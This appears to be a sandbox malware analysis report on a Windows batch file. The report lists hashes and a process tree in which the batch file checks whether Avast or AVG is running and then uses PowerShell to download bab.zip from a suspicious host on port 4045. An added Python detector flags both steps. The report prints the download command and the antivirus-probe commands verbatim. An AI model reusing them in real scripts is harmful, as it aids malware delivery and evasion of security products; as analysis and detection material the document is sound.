Analysis
Max time kernel: 239s
Max time network: 240s
Platform: windows7_x64
Resource: win7-20240729-en
Resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
Submitted: 20-11-2024 16:40
Static task: static1
Behavioral task: behavioral1
  Sample: 20112024_1640_new.bat
  Resource: win7-20240729-en (windows7-x64)
  5 signatures, 300 seconds
General
Target: 20112024_1640_new.bat
Size: 3KB
MD5: 072bfacf745a6d9d2fcd710dc0eddc2c
SHA1: b926adccaf5181c12713164a57f878316cfcdabc
SHA256: 283a4a43c44d9bc096c52ad644bd77f2129e65fbc8e1964e419f39d1cba4386d
SHA512: 568f3b32c0839bd4830e22ffad8d50f0cfcea3e294e5d7952132da956c412c33305cc0bca1f5df08848edd4296d3e1d00cb6206a4ef172d5b769b35c49166f4b
Malware Config

Signatures

Command and Scripting Interpreter: PowerShell (1 IoC)
  pid   Process
  2812  powershell.exe

Enumerates processes with tasklist (1 TTP, 2 IoCs)
  pid   Process
  2108  tasklist.exe
  2872  tasklist.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid   Process
  2812  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2108  tasklist.exe
  Token: SeDebugPrivilege  2872  tasklist.exe
  Token: SeDebugPrivilege  2812  powershell.exe

Suspicious use of WriteProcessMemory (15 IoCs; each child process is recorded three times)
  description                       pid   Process  procid_target
  PID 2268 wrote to memory of 2108  2268  cmd.exe  30
  PID 2268 wrote to memory of 2108  2268  cmd.exe  30
  PID 2268 wrote to memory of 2108  2268  cmd.exe  30
  PID 2268 wrote to memory of 2584  2268  cmd.exe  31
  PID 2268 wrote to memory of 2584  2268  cmd.exe  31
  PID 2268 wrote to memory of 2584  2268  cmd.exe  31
  PID 2268 wrote to memory of 2872  2268  cmd.exe  33
  PID 2268 wrote to memory of 2872  2268  cmd.exe  33
  PID 2268 wrote to memory of 2872  2268  cmd.exe  33
  PID 2268 wrote to memory of 2876  2268  cmd.exe  34
  PID 2268 wrote to memory of 2876  2268  cmd.exe  34
  PID 2268 wrote to memory of 2876  2268  cmd.exe  34
  PID 2268 wrote to memory of 2812  2268  cmd.exe  35
  PID 2268 wrote to memory of 2812  2268  cmd.exe  35
  PID 2268 wrote to memory of 2812  2268  cmd.exe  35
Processes

C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\20112024_1640_new.bat"
  PID: 2268
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\tasklist.exe
    tasklist /FI "IMAGENAME eq AvastUI.exe"
    PID: 2108
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\find.exe
    find /i "AvastUI.exe"
    PID: 2584

  C:\Windows\system32\tasklist.exe
    tasklist /FI "IMAGENAME eq avgui.exe"
    PID: 2872
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\find.exe
    find /i "avgui.exe"
    PID: 2876

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://timebasebsan.shop:4045/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
    PID: 2812
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
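The process tree shows a common batch-file idiom: tasklist filtered on one image name, piped into find /i for the same name. find sets ERRORLEVEL 0 only when the name appears in the output, so the pair is a yes/no test for a running security product (here Avast and AVG). The report does not show what the script does with the answer, only that the download of bab.zip from a non-standard port (4045) follows. The script below is an added example, not part of the sandbox report: it runs over constructed process-creation records built from the tree above (the field names pid, ppid, image and cmdline are an assumption about the log source; the parent PID of cmd.exe and the extra security-product names are also assumed) and flags both the AV probe pairs and the PowerShell download.

```python
"""Added example (not from the sandbox report): detection over process records.

  1. AV presence probe: tasklist.exe filtered on IMAGENAME whose output is
     consumed by find /i on the same image name, both spawned by one parent.
  2. PowerShell download: Invoke-WebRequest with -Uri and -OutFile, flagged
     when the URL uses a port other than the usual HTTP(S) ones.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The first two names are the ones probed in this report; the other two are
# assumed additions for illustration.
SECURITY_PRODUCT_IMAGES = {"avastui.exe", "avgui.exe", "msmpeng.exe", "mbamservice.exe"}

# Ports a plain HTTP(S) download is expected on; anything else is flagged.
EXPECTED_HTTP_PORTS = {80, 443, 8080}

TASKLIST_FILTER = re.compile(r'tasklist\b.*?/FI\s+"IMAGENAME\s+eq\s+([^"]+)"', re.I)
FIND_TARGET = re.compile(r'\bfind(?:\.exe)?\s+/i\s+"([^"]+)"', re.I)
INVOKE_WEBREQUEST = re.compile(
    r"Invoke-WebRequest\b.*?-Uri\s+'([^']+)'.*?-OutFile\s+'([^']+)'", re.I | re.S)

# Constructed records mirroring the report's process tree. Field names and the
# parent PID of cmd.exe (1000) are assumptions.
SAMPLE_EVENTS = [
    {"pid": 2268, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\20112024_1640_new.bat"'},
    {"pid": 2108, "ppid": 2268, "image": r"C:\Windows\system32\tasklist.exe",
     "cmdline": 'tasklist /FI "IMAGENAME eq AvastUI.exe"'},
    {"pid": 2584, "ppid": 2268, "image": r"C:\Windows\system32\find.exe",
     "cmdline": 'find /i "AvastUI.exe"'},
    {"pid": 2872, "ppid": 2268, "image": r"C:\Windows\system32\tasklist.exe",
     "cmdline": 'tasklist /FI "IMAGENAME eq avgui.exe"'},
    {"pid": 2876, "ppid": 2268, "image": r"C:\Windows\system32\find.exe",
     "cmdline": 'find /i "avgui.exe"'},
    {"pid": 2812, "ppid": 2268,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'''powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = '''
                 r'''[Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://timebasebsan.shop:4045/bab.zip' '''
                 r'''-OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"''')},
]


def tasklist_probe(cmdline):
    """Image name a tasklist command filters on, lower-cased, or None."""
    m = TASKLIST_FILTER.search(cmdline)
    return m.group(1).strip().lower() if m else None


def find_target(cmdline):
    """String a find /i command searches for, lower-cased, or None."""
    m = FIND_TARGET.search(cmdline)
    return m.group(1).strip().lower() if m else None


def download_info(cmdline):
    """URL, host, port and output path of an Invoke-WebRequest download, or None."""
    m = INVOKE_WEBREQUEST.search(cmdline)
    if not m:
        return None
    url, outfile = m.group(1), m.group(2)
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return {"url": url, "host": parts.hostname, "port": port, "outfile": outfile,
            "nonstandard_port": port not in EXPECTED_HTTP_PORTS}


def detect(events):
    """Return findings for AV probe pairs and PowerShell downloads among siblings."""
    findings = []
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ppid"]].append(ev)
    for ppid, children in by_parent.items():
        probes = {}  # image name -> pid of the tasklist that filtered on it
        for c in children:
            name = tasklist_probe(c["cmdline"])
            if name:
                probes[name] = c["pid"]
        for c in children:
            name = find_target(c["cmdline"])
            if name and name in probes:  # same name probed and then searched for
                findings.append({"rule": "av_presence_probe", "parent_pid": ppid,
                                 "image_name": name,
                                 "known_security_product": name in SECURITY_PRODUCT_IMAGES,
                                 "pids": (probes[name], c["pid"])})
        for c in children:
            info = download_info(c["cmdline"])
            if info and "powershell" in c["image"].lower():
                findings.append({"rule": "powershell_download", "pid": c["pid"], **info})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The pairing is done by image name within one parent rather than by pipe, because process-creation logs do not record the pipe; the two regexes only cover the quoting the report shows (a script using single quotes or a different filter spelling would need the patterns widened).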